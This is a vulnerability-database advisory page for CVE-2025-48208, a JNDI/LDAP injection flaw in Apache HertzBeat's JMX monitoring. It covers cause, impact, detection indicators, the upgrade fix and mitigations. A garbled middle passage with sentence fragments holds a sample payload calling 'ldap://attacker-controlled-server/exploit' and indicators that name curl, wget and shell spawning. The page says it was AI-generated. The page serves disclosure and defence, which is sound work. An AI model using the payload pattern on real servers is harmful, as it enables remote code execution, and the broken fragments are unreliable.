
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-48208 is an LDAP Injection (CWE-90) vulnerability in Apache HertzBeat (incubating) that allows authenticated attackers to execute arbitrary scripts via crafted custom commands exploiting improper neutralization of LDAP query special elements. The vulnerability was disclosed on September 5–9, 2025, and affects all Apache HertzBeat versions through 1.7.2. It carries a CVSS v3.1 base score of 8.8 (High), reflecting network-accessible exploitation with low privileges required and no user interaction needed (Apache OSS-Security, Red Hat CVE).
The root cause is improper neutralization of special elements in LDAP queries (CWE-90), specifically within the JMX monitoring component of Apache HertzBeat, where the vulnerability is described as a JMX JNDI injection issue. An authenticated attacker can craft malicious custom monitoring commands that inject LDAP-style payloads, triggering JNDI lookups that result in arbitrary script execution on the server. Exploitation requires a valid low-privileged account and the ability to define or modify custom monitoring commands within the application (Apache OSS-Security, Red Hat CVE).
Successful exploitation allows an authenticated attacker to execute arbitrary scripts on the affected HertzBeat server, resulting in high impact to confidentiality, integrity, and availability. An attacker could exfiltrate sensitive monitoring data, tamper with system configurations, or disrupt the availability of the monitoring platform. Given HertzBeat's role as an infrastructure monitoring tool, compromise could expose credentials and internal network topology stored within the application (Red Hat CVE, Apache OSS-Security).
ldap://attacker-controlled-server/exploit) in a field that is passed unsanitized to an LDAP query or JNDI lookup.ldap://, rmi://) in monitoring task configurations; Java exceptions related to JNDI resolution failures or unexpected class loading.bash, sh, curl, wget, python); unusual network connections initiated by the Java process./tmp) that were not part of the original deployment; downloaded JAR files or scripts in world-writable directories.Apache has released version 1.7.3 of HertzBeat, which fixes this vulnerability, and upgrading is the recommended remediation (Apache OSS-Security). As interim mitigations, administrators should restrict authenticated access to the HertzBeat instance to trusted users only, implement strong input validation for any LDAP or JMX-related configuration fields, and monitor for suspicious custom command creation. Additionally, blocking outbound LDAP/RMI connections from the HertzBeat server at the network firewall level can reduce the risk of successful JNDI injection exploitation.
The vulnerability was discussed briefly on the oss-security mailing list following the Apache disclosure, and was picked up by vulnerability aggregators including VulDB, CIRCL, and ENISA's EUVD shortly after publication. A Bluesky post from an infosec account noted the disclosure. No major vendor statements beyond the Apache advisory or significant media coverage have been identified at this time (Apache OSS-Security, ENISA EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."